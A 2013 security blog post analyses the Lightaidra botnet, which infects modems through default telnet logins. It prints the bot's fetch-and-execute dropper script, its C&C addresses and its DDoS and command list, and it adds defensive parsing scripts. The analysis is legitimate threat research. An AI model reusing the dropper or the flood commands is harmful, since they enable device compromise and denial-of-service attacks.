Monday, August 19, 2013

Lightaidra - Embedded Linux Device Botnet

I was checking some logs and found an IP attempting to connect to telnet (port 23) on one of my servers. Usually when you see this kind of thing in the logs it is just a scanner or someone running nmap to look around. This time I found an active bot scanning and building a botnet.

The Lightaidra DDoS malware was developed in 2012 but appears to be still doing quite well in the wild, mainly because many of the consumer network devices it targets are still running with default credentials such as admin/admin or root/admin. Other resources and blogs give more details about this particular strain; I have included some links at the bottom.
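As an added example (not part of the original post), here is the kind of log triage that turns "an IP attempting to connect to telnet" into a short list of suspects. The log lines are constructed in the style of the netfilter LOG target (SRC=, DST=, PROTO=, DPT= fields); a source that only ever touches port 23 is consistent with Lightaidra's telnet-only scanning, while a source that walks several ports looks more like an nmap sweep. The addresses are from documentation ranges.

```python
import re
from collections import defaultdict

# Constructed sample, not from the original post: netfilter LOG-target style lines
# (only the fields this script reads are kept: SRC=, DST=, PROTO=, DPT=).
SAMPLE_LOG = """\
Aug 19 03:14:02 srv kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 PROTO=TCP SPT=49231 DPT=23 SYN
Aug 19 03:14:05 srv kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 PROTO=TCP SPT=49232 DPT=23 SYN
Aug 19 03:15:11 srv kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=22 SYN
Aug 19 03:15:11 srv kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=23 SYN
Aug 19 03:15:12 srv kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=80 SYN
Aug 19 03:15:12 srv kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40004 DPT=443 SYN
Aug 19 03:16:40 srv kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=192.0.2.10 PROTO=UDP SPT=51000 DPT=23
Aug 19 03:17:02 srv kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=23 SYN
"""

FIELD_RE = re.compile(r"\b(SRC|DPT|PROTO)=(\S+)")


def parse_line(line):
    """Return (src, dport) for a TCP log line, or None for anything else."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("PROTO") != "TCP" or "SRC" not in fields or "DPT" not in fields:
        return None
    return fields["SRC"], int(fields["DPT"])


def profile_sources(log_text, telnet_port=23):
    """Map each source that touched the telnet port to
    ("telnet-only" | "port-sweep", number of telnet hits)."""
    ports_seen = defaultdict(set)
    telnet_hits = defaultdict(int)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dport = parsed
        ports_seen[src].add(dport)
        if dport == telnet_port:
            telnet_hits[src] += 1
    return {
        src: ("telnet-only" if ports_seen[src] == {telnet_port} else "port-sweep", hits)
        for src, hits in telnet_hits.items()
    }


def likely_telnet_bots(log_text):
    """Sources worth a closer look: they probed telnet and nothing else."""
    return sorted(src for src, (kind, _) in profile_sources(log_text).items()
                  if kind == "telnet-only")


if __name__ == "__main__":
    for src, (kind, hits) in profile_sources(SAMPLE_LOG).items():
        print(f"{src:16} {kind:12} telnet hits={hits}")
    print("candidates:", likely_telnet_bots(SAMPLE_LOG))
```

On a real host you would feed it the kernel log (the path varies by distribution) rather than the embedded sample; the "telnet-only" bucket is a heuristic for what to check next, not proof of infection.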

Lightaidra is an open source embedded Linux device bot, described by its creator, Federico Fazzi, as an "IRC-based mass router scanner/exploiter". In other words, instead of infecting PCs, this bot runs on devices like cable and DSL modems.

The operation of this bot is straightforward and requires two servers to manage the entire botnet: an HTTP server that hosts the binaries used for infection, and an IRC server that controls the botnet's actions.

The first thing the bot does once it has logged into a new modem is run "getbinaries.sh" (note that Lightaidra requires Linux to be running on the device):
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://127.0.0.1"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
As you can see, all this script does is download the binaries for each CPU architecture the bot supports: MIPSEL, MIPS, ARM, PowerPC and SuperH (it can also be compiled as a 32- or 64-bit x86 Linux binary). The bot does not check the architecture first and then download the correct binary. It just downloads and runs them all; whichever binary executes is the one for the correct architecture, and the rest simply fail to run. The script then deletes itself from /var/run. That's not lazy at all.

After the binary has been downloaded from the HTTP server and executed, it connects back to the IRC command and control server and awaits further instructions.

Lightaidra's primary features are scanning for other routers/modems to infect and Distributed Denial of Service (DDoS) attacks. The bot can also execute arbitrary commands on the system it is installed on.



So here is how I found it. I telnetted back to the IP I found in my logs:


No password for root. Face-palm. 
It looks like I was connected to a DSL modem. Many consumer modems and routers are left running with default credentials like "admin/admin" or "root/admin", which is why Lightaidra is able to find and exploit these devices so easily.

ps output (screenshot): the bot process running out of /var/run. This is an indicator of Lightaidra infection, since /var/run is its default path. Note that this is a device with an ARM CPU.



Look inside the default Lightaidra directory, /var/run, and you will see the downloaded binaries and the log files .lightpid and .lightscan. The file .lightscan is a list of IP addresses that the bot found to respond on telnet.



Command & Control servers I found inside the ARM and SH binaries.
178.79.183.247
192.79.153.207


The binary reveals the C&C in plain text.
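Pulling the C&C out of the binary amounts to running strings(1) over it and reading the dotted quads and IRC verbs that fall out. As an added example (not the original post's tooling), the script below does that in Python over a constructed stand-in blob: the only real value in it is the C&C address quoted above; the port, the IRC format strings, the command names and the decoy address are placed there for the example, and nothing about the layout reflects the real file.

```python
import re

# Constructed stand-in for a stripped bot binary (not the real Lightaidra file):
# a fake ELF magic, a few header-like bytes, and the kinds of NUL-terminated
# strings that an analyst looks for (C&C address, IRC protocol verbs, bot
# commands). Only the first address is from the post; the rest is made up.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"\x28\x00\x02\x00\x01\x00\x00\x00"
    + b"178.79.183.247\x00"               # C&C address quoted in the post
    + b"\x00\x12\x03\x06"
    + b"11112\x00"                        # assumed: port stored as a string
    + b"NICK %s\r\n\x00USER %s 8 * :%s\r\n\x00JOIN %s %s\r\n\x00"
    + b"PRIVMSG %s :*\x00"
    + b".synflood\x00.advscan\x00"
    + b"256.1.1.1\x00"                    # decoy: dotted quad, not a valid address
    + b"/var/run/.lightpid\x00"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
IRC_VERBS = ("NICK ", "USER ", "JOIN ", "PRIVMSG ", "PING ", "PONG ")


def extract_strings(data, min_len=4):
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def valid_ipv4(text):
    """Reject things like 256.1.1.1 that match the regex but are not addresses."""
    return all(0 <= int(octet) <= 255 for octet in text.split("."))


def find_c2_indicators(data):
    """Pull out anything that looks like C&C configuration from a binary blob."""
    ips, ports, irc, cmds = [], [], [], []
    for s in extract_strings(data):
        for ip in IPV4_RE.findall(s):
            if valid_ipv4(ip) and ip not in ips:
                ips.append(ip)
        if s.isdigit() and 1 <= int(s) <= 65535:   # bare number in port range
            ports.append(int(s))
        if s.startswith(IRC_VERBS):                 # IRC client format strings
            irc.append(s)
        if s.startswith("."):                       # bot command names
            cmds.append(s)
    return {"ipv4": ips, "ports": ports, "irc": irc, "bot_cmds": cmds}


if __name__ == "__main__":
    for key, values in find_c2_indicators(SAMPLE_BINARY).items():
        print(f"{key:9}: {values}")
```

Against a real sample you would pass the file contents to find_c2_indicators and then confirm the address by watching the bot's outbound connection, since a dotted quad in a binary can also be a version string or a decoy.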




This C&C has also been spotted by other researchers at Inside Your Botnet.


* Looking up 178.79.183.247
* Connecting to 178.79.183.247 (178.79.183.247) port 11112...
* Connected. Now logging in...
* Welcome to the Internet Relay Network @localhost.it
* Your host is irc.pollo.org, running version ngircd-19.2 (x86_64/pc/linux-gnu)
* This server has been started Sun Jun 30 2013 at 16:13:07 (UTC)
* irc.pollo.org ngircd-19.2 acCiorRswx beiIklmnoOPrRstvz
* RFC2812 IRCD=ngIRCd CASEMAPPING=ascii PREFIX=(ov)@+ CHANTYPES=#&+ CHANMODES=beI,k,l,imnOPRstz CHANLIMIT=#&+:2 :are supported on this server
* CHANNELLEN=50 NICKLEN=20 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
* There are 804 users and 0 services on 1 servers
* 1 :channels formed
* I have 804 users, 0 services and 0 servers
* 804 1014 :Current local users: 804, Max: 1014
* 804 1014 :Current global users: 804, Max: 1014
* Highest connection count: 1014 (170926 connections received)



Lightaidra Commands:

PRIVMSG %s :*
PRIVMSG %s :* .login                <password>        - login to bot's party-line
PRIVMSG %s :* .logout                                 - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
PRIVMSG %s :* *** EOF
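The help text above is effectively the bot's wire protocol: every command is a PRIVMSG whose text starts with a dot, and the flood commands carry an architecture suffix (->m/a/p/s/x) plus host, port and seconds. As an added example (not part of the original post or of Lightaidra itself), the parser below reads channel traffic in that shape and labels each command with the category the help output groups it under, which is what you would want when reading a capture of the C&C channel or writing a detection for it. The sample lines are constructed; the operator nick, the password and the target address are made up.

```python
import re

# Shape of an IRC channel message: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+) )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# .synflood / .ngsynflood / .ackflood / .ngackflood, optionally suffixed ->m/a/p/s/x
FLOOD_RE = re.compile(r"^\.(?P<kind>ngsyn|ngack|syn|ack)flood(?:->(?P<arch>[maspx]))?$")
ARCH_NAMES = {"m": "mipsel", "a": "arm", "p": "ppc", "s": "superh", "x": "x86"}


def classify(cmd):
    """Bucket a command the way the bot's own .help output groups them."""
    if cmd in (".login", ".logout"):
        return "auth"
    if cmd in (".exec", ".version", ".status", ".help"):
        return "misc"
    if cmd.startswith(".advscan") or cmd == ".stop":
        return "scan"
    if cmd == ".spoof" or FLOOD_RE.match(cmd):
        return "ddos"
    if cmd in (".setchan", ".join", ".part", ".quit"):
        return "irc"
    return None


def parse_bot_command(line):
    """Return a dict describing a Lightaidra command seen in a PRIVMSG, or None."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    if not m or not m.group("text").startswith("."):
        return None
    parts = m.group("text").split()
    cmd, args = parts[0], parts[1:]
    category = classify(cmd)
    if category is None:
        return None
    info = {
        "from": (m.group("prefix") or "").split("!")[0],
        "channel": m.group("target"),
        "category": category,
        "command": cmd,
        "args": args,
    }
    fm = FLOOD_RE.match(cmd)
    if fm and len(args) == 3:
        host, port, secs = args
        info["attack"] = {
            "type": fm.group("kind"),
            "arch": ARCH_NAMES.get(fm.group("arch"), "all"),
            "target": host,
            "port": int(port),
            "random_ports": port == "0",      # per .help: <port> 0 = random ports
            "seconds": int(secs),
        }
    return info


def triage(lines):
    """Keep only the lines that are bot commands, in order."""
    return [r for r in (parse_bot_command(l) for l in lines) if r]


# Constructed channel traffic (not a real capture).
SAMPLE_CHANNEL = [
    ":master!ops@example.invalid PRIVMSG #bots :.login s3cret",
    ":master!ops@example.invalid PRIVMSG #bots :.advscan->random root admin",
    ":master!ops@example.invalid PRIVMSG #bots :.ngackflood->a 198.51.100.20 0 120",
    ":master!ops@example.invalid PRIVMSG #bots :.exec cat /etc/passwd",
    ":someone!u@h PRIVMSG #bots :hello, is this thing on?",
    "PING :irc.pollo.org",
]

if __name__ == "__main__":
    for record in triage(SAMPLE_CHANNEL):
        print(record)
```

The useful part for a detection is that the ddos records carry the victim host, port and duration in structured form, so a single .ngackflood->a line in captured traffic tells you which target is about to be hit, from which architecture class of bots, and for how long.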
 
Links about Lightaidra
http://vierko.org/tech/lightaidra-0x2012/

http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/
